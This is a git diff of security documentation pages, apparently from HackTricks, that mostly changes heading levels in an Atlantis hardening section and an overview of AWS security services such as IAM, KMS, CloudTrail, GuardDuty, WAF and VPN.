@@ -361,7 +360,7 @@ To prevent this, you could:
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
-#### Webhook Secrets
+## Webhook Secrets
Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
@@ -371,17 +370,17 @@ If you are using Azure DevOps, instead of webhook secrets add a basic username a
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
-#### SSL/HTTPS
+## SSL/HTTPS
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
-#### Enable Authentication on Atlantis Web Server
+## Enable Authentication on Atlantis Web Server
It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
-### References
+# References
* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)\*\*\*\*
diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md
index da8a0287..d2718ef0 100644
--- a/cloud-security/aws-security.md
+++ b/cloud-security/aws-security.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# AWS Security
+# Types of services
-## Types of services
-
-### Container services
+## Container services
Services that fall under container services have the following characteristics:
@@ -32,7 +30,7 @@ Services that fall under container services have the following characteristics:
* Also, platform-level identity and access management where it exists.
* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
-### Abstract Services
+## Abstract Services
* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
* The services are accessed via endpoints using AWS application programming interfaces, APIs.
@@ -41,7 +39,7 @@ Services that fall under container services have the following characteristics:
* **Data is isolated via security mechanisms**.
* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
-## IAM - Identity and Access Management
+# IAM - Identity and Access Management
IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
@@ -51,11 +49,11 @@ IAM is the service that will allow you to manage **Authentication**, **Authoriza
IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
-### Users
+## Users
This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**.
-#### CLI
+### CLI
* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
@@ -65,23 +63,23 @@ _Create a new access key -> Apply the new key to system/application -> mark orig
**MFA** is **supported** when using the AWS **CLI**.
-### Groups
+## Groups
These are objects that **contain multiple users**. Permissions can be assigned to a user or inherit form a group. **Giving permission to groups and not to users the secure way to grant permissions**.
-### Roles
+## Roles
Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized.
An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access.
-#### AWS Security Token Service (STS)
+### AWS Security Token Service (STS)
This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
-### Policies
+## Policies
-#### Policy Permissions
+### Policy Permissions
Are used to assign permissions. There are 2 types:
@@ -114,32 +112,32 @@ If **single "Deny" exist, it will override the "Allow"**, except for requests th
}
```
-#### Inline Policies
+### Inline Policies
This kind of policies are **directly assigned** to a user, group or role. Then, they not appear in the Policies list as any other one can use them.\
Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
-#### S3 Bucket Policies
+### S3 Bucket Policies
Can only be applied to S3 Buckets. They contains an attribute called 'principal' that can be: IAM users, Federated users, another AWS account, an AWS service. P**rincipals define who/what should be allowed or denied access to various S3 resources.**
-### Multi-Factor Authentication
+## Multi-Factor Authentication
It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
-### Identity Federation
+## Identity Federation
Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account. \
An example of an identity provider can be your own corporate Microsoft Active Directory(via SAML) or OpenID services (like Google). Federated access will then allow the users within it to access AWS.\
AWS Identity Federation connects via IAM roles.
-#### Cross Account Trusts and Roles
+### Cross Account Trusts and Roles
**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
-#### AWS Simple AD
+### AWS Simple AD
Not supported:
@@ -151,16 +149,16 @@ Not supported:
* Schema Extensions
* No Direct access to OS or Instances
-#### Web Federation or OpenID Authentication
+### Web Federation or OpenID Authentication
The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However this doesn't grant access to the AWS console, just access to resources within AWS.
-### Other IAM options
+## Other IAM options
* You can **set a password policy setting** options like minimum length and password requirements.
* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
-## KMS - Key Management Service
+# KMS - Key Management Service
AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs)
@@ -180,7 +178,7 @@ There are 2 types of master keys:
**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**.
-### Key Policies
+## Key Policies
These defines **who can use and access a key in KMS**. By default root user has full access over KMS, if you delete this one, you need to contact AWS for support.
@@ -204,7 +202,7 @@ Access:
* Via IAM policy
* Via grants
-### Key Administrators
+## Key Administrators
Key administrator by default:
@@ -212,7 +210,7 @@ Key administrator by default:
* Only IAM users and roles can be added to Key Administrators list (not groups)
* If external CMK is used, Key Administrators have the permission to import key material
-### Rotation of CMKs
+## Rotation of CMKs
* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases.
* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed.
@@ -220,7 +218,7 @@ Key administrator by default:
* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
-#### Manual rotation
+### Manual rotation
* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID.
* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
@@ -228,7 +226,7 @@ Key administrator by default:
You can import keys from your on-premises key infrastructure .
-### Other information
+## Other information
KMS is priced per number of encryption/decryption requests received from all services per month.
@@ -242,7 +240,7 @@ With KMS policy you can do the following:
You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region.
-## S3
+# S3
Amazon S3 is a service that allows you **store important amounts of data**.
@@ -250,11 +248,11 @@ Amazon S3 provides multiple options to achieve the **protection** of data at RES
With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
-### S3 Access logs
+## S3 Access logs
It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket (the one is saving the logs needs to be in the same region.
-### S3 Encryption Mechanisms
+## S3 Encryption Mechanisms
**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
@@ -314,7 +312,7 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever
* S3 sends the encrypted data and DEK
* As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
-## HSM - Hardware Security Module
+# HSM - Hardware Security Module
Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used.
@@ -338,7 +336,7 @@ Additionally, cross consideration must be made in the purchase of third party so
**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.
-### CloudHSM Suggestions
+## CloudHSM Suggestions
1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
@@ -354,7 +352,7 @@ The most common reason to use CloudHSM is compliance standards that you must mee
The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
-## Amazon Athena
+# Amazon Athena
Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
@@ -366,7 +364,7 @@ Amazon Athena supports the **hability to query S3 data that is already encrypted
SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.
-## AWS CloudTrail
+# AWS CloudTrail
This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains:
@@ -387,11 +385,11 @@ When creating a Trail the event selectors will allow you to indicate the trail t
Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys.
-### Log File Naing Convention
+## Log File Naing Convention
.png>)
-### S3 folder structure
+## S3 folder structure
.png>)
@@ -401,7 +399,7 @@ Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names,
.png>)
-### Aggregate Logs from Multiple Accounts
+## Aggregate Logs from Multiple Accounts
* Create a Trial in the AWS account where you want the log files to be delivered to
* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
@@ -409,7 +407,7 @@ Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names,
However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account
-### Log Files Checking
+## Log Files Checking
You can check that the logs haven't been altered by running
@@ -417,7 +415,7 @@ You can check that the logs haven't been altered by running
aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose]
```
-### Logs to CloudWatch
+## Logs to CloudWatch
**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\
Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
@@ -425,17 +423,17 @@ Note that in order to allow CloudTrail to send the logs to CloudWatch a **role**
* CreateLogStream: This allows to create a CloudWatch Logs log streams
* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
-### Event History
+## Event History
CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
.png>)
-### Insights
+## Insights
**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
-## CloudWatch
+# CloudWatch
Amazon CloudWatch allows to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\
CloudWatch Log Event have a **size limitation of 256KB of each log line**.
@@ -450,7 +448,7 @@ Events that are monitored:
* API calls that resulted in failed authorization
* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
-### Agent Installation
+## Agent Installation
You can install agents insie your machines/containers to automatically send the logs back to CloudWatch.
@@ -460,17 +458,17 @@ You can install agents insie your machines/containers to automatically send the
A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
-## Cost Explorer and Anomaly detection
+# Cost Explorer and Anomaly detection
This allows you to check how are you expending money in AWS services and help you **detecting anomalies**.\
Moreover, you can configure an anomaly detection so AWS will warn you when some anomaly in costs is found.
-### Budgets
+## Budgets
Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**.\
Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?).
-## AWS Config
+# AWS Config
AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI.\
This service is **region specific**.
@@ -491,7 +489,7 @@ A configuration item or **CI** as it's known, is a key component of AWS Config.
**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account.
-### Config Rules
+## Config Rules
Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
@@ -502,13 +500,13 @@ AWS have a number of **predefined rules** that fall under the security umbrella
Limit of 50 config rules per region before you need to contact AWS for an increase.\
Non compliant results are NOT deleted.
-## SNS Topic
+# SNS Topic
SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms.\
You can have various endpoints associated to the SNS stream.\
You can use SNS topic to send notifications to you via email or to SQS to treate programatically the notification.
-## Inspector
+# Inspector
The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. This makes it an easy service to be configured and added at any point to existing resources already running within your AWS infrastructure. This helps Amazon Inspector to become a seamless integration with any of your existing security processes and procedures as another level of security.
@@ -521,7 +519,7 @@ These are the tests that AWS Inspector allow you to perform:
You can make any of those run on the EC2 machines you decide.
-### Element of AWS Inspector
+## Element of AWS Inspector
**Role**: Create or select a role to allow Amazon Inspector to have read only access to the EC2 instances (DescribeInstances)\
**Assessment Targets**: Group of EC2 instances that you want to run an assessment against\
@@ -547,7 +545,7 @@ Amazon Inspector has a pre-defined set of rules, grouped into packages. Each Ass
Note that nowadays AWS already allow you to **autocreate** all the necesary **configurations** and even automatically **install the agents inside the EC2 instances.**
{% endhint %}
-### **Reporting**
+## **Reporting**
**Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings.
@@ -556,7 +554,7 @@ Note that nowadays AWS already allow you to **autocreate** all the necesary **co
* The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred.
* The **full report** is the finding report + a list of rules that were passed.
-## Trusted Advisor
+# Trusted Advisor
The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a cross-region service.
@@ -569,7 +567,7 @@ The full power and potential of AWS Trusted Advisor is only really **available i
Trusted advisor can send notifications and you can exclude items from it.\
Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.**
-## Amazon GuardDuty
+# Amazon GuardDuty
Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains.\
For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\
@@ -601,7 +599,7 @@ You pay for the processing of your log files, per 1 million events per months fr
When a user disable GuardDuty, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the existing findings will be lost.\
If you just stop it, the existing findings will remain.
-## Amazon Macie
+# Amazon Macie
The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account.
@@ -680,13 +678,13 @@ The research function allows to create you own queries again all Amazon Macie da
It possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie.
-## Route 53
+# Route 53
You can very easily create **health checks for web pages** via Route53. For example you can create HTTP checks on port 80 to a page to check that the web server is working.
Route 53 service is mainly used for checking the health of the instances. To check the health of the instances we can ping a certain DNS point and we should get response from the instance if the instances are healthy.
-## CloufFront
+# CloufFront
Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
@@ -694,9 +692,9 @@ The log files capture data over a period of time and depending on the amount of
**By default cookie logging is disabled** but you can enable it.
-## VPC
+# VPC
-### VPC Flow Logs
+## VPC Flow Logs
Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allows you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**.
@@ -718,7 +716,7 @@ For every network interface that publishes data to the CloudWatch log group, it
.png>)
-### Subnets
+## Subnets
Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.\
Valid CIDR are from a /16 netmask to a /28 netmask.\
@@ -738,7 +736,7 @@ By default, all subnets have the automatic assigned of public IP addresses turne
If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet.
-### VPC Peering
+## VPC Peering
VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
@@ -746,7 +744,7 @@ Once the peer connectivity is established, **resources in one VPC can access res
If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
-## AWS Secrets Manager
+# AWS Secrets Manager
AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**.
@@ -758,7 +756,7 @@ To allow a user form a different account to access your secret you need to autho
**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
-## EMR
+# EMR
EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark.
@@ -778,7 +776,7 @@ Once the TLS certificate provider has been configured in the security configurat
* Tez Shuffle Handler uses TLS.
* Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer.
-## RDS - Relational Database Service
+# RDS - Relational Database Service
RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption.
@@ -794,7 +792,7 @@ If you want to use the TDE method, then you must first ensure that the database
Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database.
-## Amazon Kinesis Firehouse
+# Amazon Kinesis Firehouse
Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch.
@@ -812,7 +810,7 @@ As a part of this process, it's important to ensure that both producer and consu
Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame.
-## Amazon Redshift
+# Amazon Redshift
Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business.
@@ -820,7 +818,7 @@ Redshift is a fully managed service that can scale up to over a petabyte in size
Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**.
-### KMS
+## KMS
During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective.
@@ -836,7 +834,7 @@ This encrypted DEK is then sent over a secure channel and stored in Redshift sep
You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3.
-### CloudHSM
+## CloudHSM
When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates.
@@ -848,19 +846,19 @@ If your internal security policies or governance controls dictate that you must
During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'.
-## WAF
+# WAF
AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define.
So there are a number of essential components relating to WAF, these being: Conditions, Rules and Web access control lists, also known as Web ACLs
-### Conditions
+## Conditions
Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf.
You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer.
-### Rules
+## Rules
Using these conditions you can create rules: For example, block request if 2 conditions are met.\
When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**.
@@ -869,7 +867,7 @@ The only **difference** between a rate-based rule and a regular rule is that **r
When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule.
-### Actions
+## Actions
An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**.
@@ -883,11 +881,11 @@ If an **incoming request does not meet any rule** within the Web ACL then the re
2. BlackListed IPs Block
3. Any Bad Signatures also as Block.
-### CloudWatch
+## CloudWatch
WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests.
-## AWS Firewall Manager
+# AWS Firewall Manager
AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources.
@@ -899,7 +897,7 @@ A **rule group** (a set of WAF rules together) can be added to an AWS Firewall M
**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option).
-## AWS Shield
+# AWS Shield
AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
@@ -909,13 +907,13 @@ AWS Shield has been designed to help **protect your infrastructure against distr
Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
-## VPN
+# VPN
-### Site-to-Site VPN
+## Site-to-Site VPN
**Connect your on premisses network with your VPC.**
-#### Concepts
+### Concepts
* **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
@@ -926,7 +924,7 @@ Whereas the Standard version of Shield offered protection against layer three an
* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
-#### Limitations
+### Limitations
* IPv6 traffic is not supported for VPN connections on a virtual private gateway.
* An AWS VPN connection does not support Path MTU Discovery.
@@ -935,11 +933,11 @@ In addition, take the following into consideration when you use Site-to-Site VPN
* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
-### Components of Client VPN
+## Components of Client VPN
**Connect from your machine to your VPC**
-#### Concepts
+### Concepts
* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
@@ -952,7 +950,7 @@ In addition, take the following into consideration when you use Site-to-Site VPN
* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
-#### Limitations
+### Limitations
* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
@@ -970,13 +968,13 @@ In addition, take the following into consideration when you use Site-to-Site VPN
```
* The self-service portal is **not available for clients that authenticate using mutual authentication**.
-## Amazon Cognito
+# Amazon Cognito
Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple.
The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together.
-### **User pools**
+## **User pools**
